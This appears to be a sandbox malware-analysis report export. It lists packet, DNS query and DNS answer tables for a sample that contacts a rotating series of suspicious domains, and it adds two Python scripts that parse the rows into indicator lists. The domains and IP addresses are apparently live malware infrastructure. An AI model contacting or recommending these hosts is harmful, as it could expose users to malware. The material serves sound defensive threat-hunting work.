Nov 21, 2024 16:23:48.760806084 CET | 80 | 50021 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:48.760831118 CET | 80 | 50021 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:48.760914087 CET | 50021 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:48.761543036 CET | 80 | 50021 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:48.761996984 CET | 50021 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:48.891000032 CET | 50021 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:49.918258905 CET | 50022 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:50.038090944 CET | 80 | 50022 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:50.038203955 CET | 50022 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:50.057804108 CET | 50022 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:50.177491903 CET | 80 | 50022 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:51.334629059 CET | 80 | 50022 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:51.335769892 CET | 80 | 50022 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:51.335832119 CET | 50022 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:51.335866928 CET | 80 | 50022 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:51.335958004 CET | 50022 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:51.339724064 CET | 50022 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:51.459351063 CET | 80 | 50022 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:56.676175117 CET | 50023 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:56.796583891 CET | 80 | 50023 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:23:56.797246933 CET | 50023 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:56.810878038 CET | 50023 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:56.930735111 CET | 80 | 50023 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:23:58.133624077 CET | 80 | 50023 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:23:58.135015011 CET | 80 | 50023 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:23:58.141108036 CET | 50023 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:58.315115929 CET | 50023 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:59.331530094 CET | 50024 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:59.451407909 CET | 80 | 50024 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:23:59.451494932 CET | 50024 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:59.469146967 CET | 50024 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:23:59.589436054 CET | 80 | 50024 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:00.716937065 CET | 80 | 50024 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:00.720011950 CET | 80 | 50024 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:00.720477104 CET | 50024 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:00.987374067 CET | 50024 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:02.005409002 CET | 50025 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:02.125088930 CET | 80 | 50025 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:02.133050919 CET | 50025 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:02.145051003 CET | 50025 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:02.264970064 CET | 80 | 50025 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:02.265033960 CET | 80 | 50025 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:03.413825035 CET | 80 | 50025 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:03.415605068 CET | 80 | 50025 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:03.415664911 CET | 50025 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:03.656816959 CET | 50025 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:04.675482988 CET | 50026 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:04.795213938 CET | 80 | 50026 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:04.797316074 CET | 50026 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:04.807034969 CET | 50026 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:04.926712990 CET | 80 | 50026 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:05.987823963 CET | 80 | 50026 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:05.987845898 CET | 80 | 50026 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:05.987960100 CET | 50026 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:05.988827944 CET | 80 | 50026 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:05.988871098 CET | 50026 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:05.991818905 CET | 50026 | 80 | 192.168.2.9 | 104.21.58.90
Nov 21, 2024 16:24:06.112889051 CET | 80 | 50026 | 104.21.58.90 | 192.168.2.9
Nov 21, 2024 16:24:11.348372936 CET | 50027 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:11.468287945 CET | 80 | 50027 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:11.468378067 CET | 50027 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:11.483397007 CET | 50027 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:11.606358051 CET | 80 | 50027 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:12.643196106 CET | 80 | 50027 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:12.645181894 CET | 80 | 50027 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:12.645407915 CET | 50027 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:12.645540953 CET | 80 | 50027 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:12.646079063 CET | 50027 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:12.984755039 CET | 50027 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:15.238018990 CET | 50028 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:15.357966900 CET | 80 | 50028 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:15.358056068 CET | 50028 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:15.373236895 CET | 50028 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:15.492897034 CET | 80 | 50028 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:16.492039919 CET | 80 | 50028 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:16.492265940 CET | 80 | 50028 | 172.67.192.207 | 192.168.2.9
Nov 21, 2024 16:24:16.492331982 CET | 50028 | 80 | 192.168.2.9 | 172.67.192.207
Nov 21, 2024 16:24:16.875452042 CET | 50028 | 80 | 192.168.2.9 | 172.67.192.207
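The packet rows of this report export with their five columns (timestamp, source port, destination port, source IP, destination IP) run together, which makes "8050019104.21.62.184192.168.2.9" ambiguous on its face. The Python below is an added example, not part of the Joe Sandbox report: it enumerates every way such a row could split, keeps only the reading in which one endpoint is the analysis VM (192.168.2.9, as shown in the report) using an ephemeral port against a well-known service port, and then summarizes per peer which client ports the VM used and when. The 49152 lower bound for client ports is an assumption about the Windows dynamic port range; the sample rows are copied from the packet tables of this report.

```python
import re
from datetime import datetime

HOST = "192.168.2.9"       # analysis VM address, as shown in the report
EPHEMERAL_MIN = 49152      # assumption: Windows dynamic (client) port range starts here

# Constructed sample: rows copied verbatim from the flattened packet tables of this report.
PACKET_ROWS = [
    "Nov 21, 2024 16:23:47.246718884 CET5002180192.168.2.9104.21.62.184",
    "Nov 21, 2024 16:23:47.366437912 CET8050021104.21.62.184192.168.2.9",
    "Nov 21, 2024 16:23:49.918258905 CET5002280192.168.2.9104.21.62.184",
    "Nov 21, 2024 16:23:56.676175117 CET5002380192.168.2.9104.21.58.90",
    "Nov 21, 2024 16:23:59.331530094 CET5002480192.168.2.9104.21.58.90",
    "Nov 21, 2024 16:24:11.348372936 CET5002780192.168.2.9172.67.192.207",
    "Nov 21, 2024 16:24:15.238018990 CET5002880192.168.2.9172.67.192.207",
    "Nov 21, 2024 16:21:21.695173025 CET6272553192.168.2.91.1.1.1",
    "Nov 21, 2024 16:21:22.827137947 CET53627251.1.1.1192.168.2.9",
]

ROW_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CET(?P<rest>[0-9.]+)$")


def _octet_ok(s):
    return s.isdigit() and len(s) <= 3 and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and 1 <= len(s) <= 5 and s[0] != "0" and int(s) <= 65535


def _to_dt(ts):
    # The report prints nanoseconds; strptime's %f takes at most six digits.
    return datetime.strptime(ts[:-3], "%b %d, %Y %H:%M:%S.%f")


def parse_packet_row(row, host=HOST):
    """Split a fused 'Timestamp SourcePort DestPort SourceIP DestIP' row.

    The digits before the first '.' are <sport><dport><first octet of src IP>
    and the fourth dot-group is <last octet of src IP><first octet of dst IP>.
    Every split is enumerated and filtered: octets and ports must be well
    formed, exactly one endpoint must be the analysis host, the host side must
    use an ephemeral port and the peer a well-known (<1024) service port.
    """
    m = ROW_RE.match(row)
    if not m:
        raise ValueError("not a packet row: %r" % row)
    parts = m.group("rest").split(".")
    if len(parts) != 7:
        raise ValueError("unexpected shape: %r" % row)
    found = []
    for i in range(1, 4):                        # src first octet: 1-3 digits
        ports, o1 = parts[0][:-i], parts[0][-i:]
        for j in range(1, 4):                    # src last octet: 1-3 digits
            o4, d1 = parts[3][:j], parts[3][j:]
            src = ".".join([o1, parts[1], parts[2], o4])
            dst = ".".join([d1, parts[4], parts[5], parts[6]])
            if not all(map(_octet_ok, src.split(".") + dst.split("."))):
                continue
            if (src == host) == (dst == host):   # exactly one side is the VM
                continue
            for k in range(1, len(ports)):
                sp, dp = ports[:k], ports[k:]
                if not (_port_ok(sp) and _port_ok(dp)):
                    continue
                hp, pp = (int(sp), int(dp)) if src == host else (int(dp), int(sp))
                if hp >= EPHEMERAL_MIN and pp < 1024:
                    found.append((_to_dt(m.group("ts")), int(sp), int(dp), src, dst))
    if len(found) != 1:
        raise ValueError("ambiguous or unparsable row (%d candidates): %r" % (len(found), row))
    return found[0]


def summarize_sessions(rows, host=HOST):
    """Per peer: service port, client ports the VM used, first and last packet time."""
    out = {}
    for ts, sp, dp, src, dst in map(parse_packet_row, rows):
        peer, cport, sport = (dst, sp, dp) if src == host else (src, dp, sp)
        e = out.setdefault(peer, {"service_port": sport, "client_ports": set(),
                                  "first": ts, "last": ts})
        e["client_ports"].add(cport)
        e["first"], e["last"] = min(e["first"], ts), max(e["last"], ts)
    return out


if __name__ == "__main__":
    for peer, e in sorted(summarize_sessions(PACKET_ROWS).items()):
        print(peer, e["service_port"], sorted(e["client_ports"]),
              e["first"].time(), e["last"].time())
```

Run against the full table, the summary shows the pattern visible above: one new client port per short HTTP session and a handful of sessions to each resolved address before the sample moves on to the next one; a row that admits no single reading raises instead of guessing.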
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 16:20:33.246639967 CET | 52334 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:20:34.209563017 CET | 53 | 52334 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:20:51.066520929 CET | 49611 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:20:51.854418993 CET | 53 | 49611 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:06.644542933 CET | 56202 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:07.401488066 CET | 53 | 56202 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:21.695173025 CET | 62725 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:22.703270912 CET | 62725 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:22.827137947 CET | 53 | 62725 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:22.839989901 CET | 53 | 62725 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:37.316838980 CET | 52821 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:38.312980890 CET | 52821 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:38.364248991 CET | 53 | 52821 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:38.450680017 CET | 53 | 52821 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:52.883775949 CET | 55746 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:53.890899897 CET | 55746 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:21:54.049530983 CET | 53 | 55746 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:21:54.049571991 CET | 53 | 55746 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:22:08.847954035 CET | 54627 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:22:09.487808943 CET | 53 | 54627 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:22:25.489792109 CET | 58323 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:22:26.237521887 CET | 53 | 58323 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:22:40.956830025 CET | 52238 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:22:41.276529074 CET | 53 | 52238 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:22:55.910799026 CET | 50711 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:22:56.336155891 CET | 53 | 50711 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:23:10.738986015 CET | 52148 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:23:11.355724096 CET | 53 | 52148 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:23:25.802378893 CET | 51163 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:23:26.797244072 CET | 51163 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:23:26.924962044 CET | 53 | 51163 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:23:26.935272932 CET | 53 | 51163 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:23:41.435561895 CET | 53403 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:23:41.896976948 CET | 53 | 53403 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:23:56.347815990 CET | 63107 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:23:56.670701981 CET | 53 | 63107 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 16:24:11.005058050 CET | 57252 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 16:24:11.344547987 CET | 53 | 57252 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 16:20:33.246639967 CET | 192.168.2.9 | 1.1.1.1 | 0x5a | Standard query (0) | www.rtpterbaruwaktu3.xyz | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:20:51.066520929 CET | 192.168.2.9 | 1.1.1.1 | 0x45bf | Standard query (0) | www.70kdd.top | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:06.644542933 CET | 192.168.2.9 | 1.1.1.1 | 0x20c6 | Standard query (0) | www.acond-22-mvr.click | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:21.695173025 CET | 192.168.2.9 | 1.1.1.1 | 0x777 | Standard query (0) | www.smartcongress.net | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:22.703270912 CET | 192.168.2.9 | 1.1.1.1 | 0x777 | Standard query (0) | www.smartcongress.net | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:37.316838980 CET | 192.168.2.9 | 1.1.1.1 | 0xbf17 | Standard query (0) | www.mrpokrovskii.pro | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:38.312980890 CET | 192.168.2.9 | 1.1.1.1 | 0xbf17 | Standard query (0) | www.mrpokrovskii.pro | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:52.883775949 CET | 192.168.2.9 | 1.1.1.1 | 0x11fb | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:53.890899897 CET | 192.168.2.9 | 1.1.1.1 | 0x11fb | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:08.847954035 CET | 192.168.2.9 | 1.1.1.1 | 0xef2b | Standard query (0) | www.matteicapital.online | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:25.489792109 CET | 192.168.2.9 | 1.1.1.1 | 0xc500 | Standard query (0) | www.llljjjiii.shop | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:40.956830025 CET | 192.168.2.9 | 1.1.1.1 | 0x4262 | Standard query (0) | www.ampsamkok88.shop | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:55.910799026 CET | 192.168.2.9 | 1.1.1.1 | 0x6db5 | Standard query (0) | www.gogawithme.live | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:23:10.738986015 CET | 192.168.2.9 | 1.1.1.1 | 0x9c4 | Standard query (0) | www.54248711.xyz | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:23:25.802378893 CET | 192.168.2.9 | 1.1.1.1 | 0x28dc | Standard query (0) | www.canadavinreport.site | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:23:26.797244072 CET | 192.168.2.9 | 1.1.1.1 | 0x28dc | Standard query (0) | www.canadavinreport.site | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:23:41.435561895 CET | 192.168.2.9 | 1.1.1.1 | 0x3096 | Standard query (0) | www.questmatch.pro | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:23:56.347815990 CET | 192.168.2.9 | 1.1.1.1 | 0xcd46 | Standard query (0) | www.bser101pp.buzz | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:24:11.005058050 CET | 192.168.2.9 | 1.1.1.1 | 0xa454 | Standard query (0) | www.3kw40881107247y.click | A (IP address) | IN (0x0001) | false
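The DNS query and answer rows are the part of this report most worth turning into indicators: one new domain roughly every fifteen seconds, some queried twice, and the addresses each one resolved to. In the export the name, CNAME target and address columns are fused, so "www.ytsd88.top47.76.213.197" could be read with the name ending in a digit. The Python below is an added example, not part of the Joe Sandbox report: it parses both row types, resolves the fused name/target/address columns by preferring names already seen (queried names and earlier CNAME targets) and otherwise requiring a unique well-formed split, then reports query counts and the final A records per queried name after following CNAME chains. It assumes the VM address 192.168.2.9 shown in the report; the sample rows are copied from the DNS tables of this report, and www.bser101pp.buzz is included as a queried name with no answer in the sample to show the unresolved case.

```python
import re
from collections import Counter, defaultdict

HOST = "192.168.2.9"      # analysis VM address, as shown in the report
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
TS = r"\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ CET"

# Source and destination IPs are fused with each other and with the 0x transaction id;
# anchoring one side on the VM address and the other on "0x" makes that split unique.
QUERY_RE = re.compile(
    rf"^(?P<ts>{TS})(?P<src>{re.escape(HOST)})(?P<dst>{IPV4})(?P<id>0x[0-9a-f]+)"
    r"Standard query \(0\)(?P<name>.+?)(?P<type>[A-Z]+) \([^)]*\)IN \(0x0001\)(?P<doh>true|false)$")
ANSWER_RE = re.compile(
    rf"^(?P<ts>{TS})(?P<src>{IPV4})(?P<dst>{re.escape(HOST)})(?P<id>0x[0-9a-f]+)"
    r"No error \(0\)(?P<body>.+?)(?P<type>CNAME|A) \([^)]*\)IN \(0x0001\)(?P<doh>true|false)$")

# Constructed sample: rows copied verbatim from the DNS tables of this report.
QUERY_ROWS = [
    "Nov 21, 2024 16:21:21.695173025 CET192.168.2.91.1.1.10x777Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:22.703270912 CET192.168.2.91.1.1.10x777Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:37.316838980 CET192.168.2.91.1.1.10xbf17Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:52.883775949 CET192.168.2.91.1.1.10x11fbStandard query (0)www.ytsd88.topA (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:23:56.347815990 CET192.168.2.91.1.1.10xcd46Standard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false",
]
ANSWER_ROWS = [
    "Nov 21, 2024 16:20:04.644072056 CET1.1.1.1192.168.2.90xa059No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false",
    "Nov 21, 2024 16:20:04.644072056 CET1.1.1.1192.168.2.90xa059No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:22.827137947 CET1.1.1.1192.168.2.90x777No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false",
    "Nov 21, 2024 16:21:22.827137947 CET1.1.1.1192.168.2.90x777No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:38.364248991 CET1.1.1.1192.168.2.90xbf17No error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:38.364248991 CET1.1.1.1192.168.2.90xbf17No error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false",
    "Nov 21, 2024 16:21:54.049530983 CET1.1.1.1192.168.2.90x11fbNo error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false",
]


def _split_known(body, known):
    """(name, rest) if body starts with a name already seen; longest match wins."""
    for n in sorted(known, key=len, reverse=True):
        if body.startswith(n) and len(body) > len(n):
            return n, body[len(n):]
    return None


def split_a_row(body, known):
    """name+IPv4 fused. Prefer a known name; otherwise every split whose tail is a
    well-formed IPv4 is a candidate, names ending in a digit are deprioritised
    (they may have swallowed the first octet) and the row is rejected if not unique."""
    hit = _split_known(body, known)
    if hit and re.fullmatch(IPV4, hit[1]):
        return hit
    cands = []
    for m in re.finditer(rf"(?=({IPV4})$)", body):
        name, ip = body[:m.start()], m.group(1)
        if name and all(int(o) <= 255 for o in ip.split(".")):
            cands.append((name, ip))
    good = [c for c in cands if not c[0][-1].isdigit()] or cands
    if len(good) != 1:
        raise ValueError("ambiguous A row: %r" % body)
    return good[0]


def split_cname_row(body, known):
    """name+target fused. Prefer a known name; otherwise take the unique split where
    the target is the name minus leading labels, as in www.x.y -> x.y."""
    hit = _split_known(body, known)
    if hit:
        return hit
    cands = [(body[:i], body[i:]) for i in range(1, len(body))
             if body[:i].endswith("." + body[i:])]
    if len(cands) != 1:
        raise ValueError("cannot split CNAME row: %r" % body)
    return cands[0]


def extract_iocs(query_rows, answer_rows):
    """Return (query counts per name, final A records per queried name, CNAME map)."""
    queries = Counter()
    for row in query_rows:
        m = QUERY_RE.match(row)
        if not m:
            raise ValueError("not a query row: %r" % row)
        queries[m.group("name")] += 1
    known, cnames, addrs = set(queries), {}, defaultdict(set)
    for row in answer_rows:                 # in report order, so targets precede their A rows
        m = ANSWER_RE.match(row)
        if not m:
            raise ValueError("not an answer row: %r" % row)
        if m.group("type") == "CNAME":
            name, target = split_cname_row(m.group("body"), known)
            cnames[name] = target
            known.update((name, target))
        else:
            name, ip = split_a_row(m.group("body"), known)
            addrs[name].add(ip)
            known.add(name)
    resolved = {}
    for name in queries:
        n, seen = name, set()
        while n in cnames and n not in seen:  # follow the chain, guard against loops
            seen.add(n)
            n = cnames[n]
        resolved[name] = set(addrs.get(n, ()))
    return queries, resolved, cnames


if __name__ == "__main__":
    counts, resolved, _ = extract_iocs(QUERY_ROWS, ANSWER_ROWS)
    for name in counts:
        print(name, counts[name], sorted(resolved[name]) or "no answer seen")
```

The domain list and the resolved addresses are the indicators to block or hunt for; a queried name with an empty set is either a decoy that never resolved or one whose answer lies outside the rows you fed in, and the row order matters because a CNAME target becomes a known name for the A row that follows it.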
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 16:20:04.644072056 CET | 1.1.1.1 | 192.168.2.9 | 0xa059 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 16:20:04.644072056 CET | 1.1.1.1 | 192.168.2.9 | 0xa059 | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:20:34.209563017 CET | 1.1.1.1 | 192.168.2.9 | 0x5a | No error (0) | www.rtpterbaruwaktu3.xyz | rtpterbaruwaktu3.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 16:20:34.209563017 CET | 1.1.1.1 | 192.168.2.9 | 0x5a | No error (0) | rtpterbaruwaktu3.xyz | - | 103.21.221.87 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:20:51.854418993 CET | 1.1.1.1 | 192.168.2.9 | 0x45bf | No error (0) | www.70kdd.top | 70kdd.top | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 16:20:51.854418993 CET | 1.1.1.1 | 192.168.2.9 | 0x45bf | No error (0) | 70kdd.top | - | 38.47.232.124 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:07.401488066 CET | 1.1.1.1 | 192.168.2.9 | 0x20c6 | No error (0) | www.acond-22-mvr.click | - | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:22.827137947 CET | 1.1.1.1 | 192.168.2.9 | 0x777 | No error (0) | www.smartcongress.net | smartcongress.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 16:21:22.827137947 CET | 1.1.1.1 | 192.168.2.9 | 0x777 | No error (0) | smartcongress.net | - | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:22.839989901 CET | 1.1.1.1 | 192.168.2.9 | 0x777 | No error (0) | www.smartcongress.net | smartcongress.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 16:21:22.839989901 CET | 1.1.1.1 | 192.168.2.9 | 0x777 | No error (0) | smartcongress.net | - | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:38.364248991 CET | 1.1.1.1 | 192.168.2.9 | 0xbf17 | No error (0) | www.mrpokrovskii.pro | - | 194.85.61.76 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:38.364248991 CET | 1.1.1.1 | 192.168.2.9 | 0xbf17 | No error (0) | www.mrpokrovskii.pro | - | 109.70.26.37 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:38.450680017 CET | 1.1.1.1 | 192.168.2.9 | 0xbf17 | No error (0) | www.mrpokrovskii.pro | - | 194.85.61.76 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:38.450680017 CET | 1.1.1.1 | 192.168.2.9 | 0xbf17 | No error (0) | www.mrpokrovskii.pro | - | 109.70.26.37 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:54.049530983 CET | 1.1.1.1 | 192.168.2.9 | 0x11fb | No error (0) | www.ytsd88.top | - | 47.76.213.197 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:21:54.049571991 CET | 1.1.1.1 | 192.168.2.9 | 0x11fb | No error (0) | www.ytsd88.top | - | 47.76.213.197 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:09.487808943 CET | 1.1.1.1 | 192.168.2.9 | 0xef2b | No error (0) | www.matteicapital.online | - | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:26.237521887 CET | 1.1.1.1 | 192.168.2.9 | 0xc500 | No error (0) | www.llljjjiii.shop | - | 8.210.114.150 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:41.276529074 CET | 1.1.1.1 | 192.168.2.9 | 0x4262 | No error (0) | www.ampsamkok88.shop | - | 172.67.209.48 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:22:41.276529074 CET | 1.1.1.1 | 192.168.2.9 | 0x4262 | No error (0) | www.ampsamkok88.shop | - | 104.21.15.243 | A (IP address) | IN (0x0001) | false
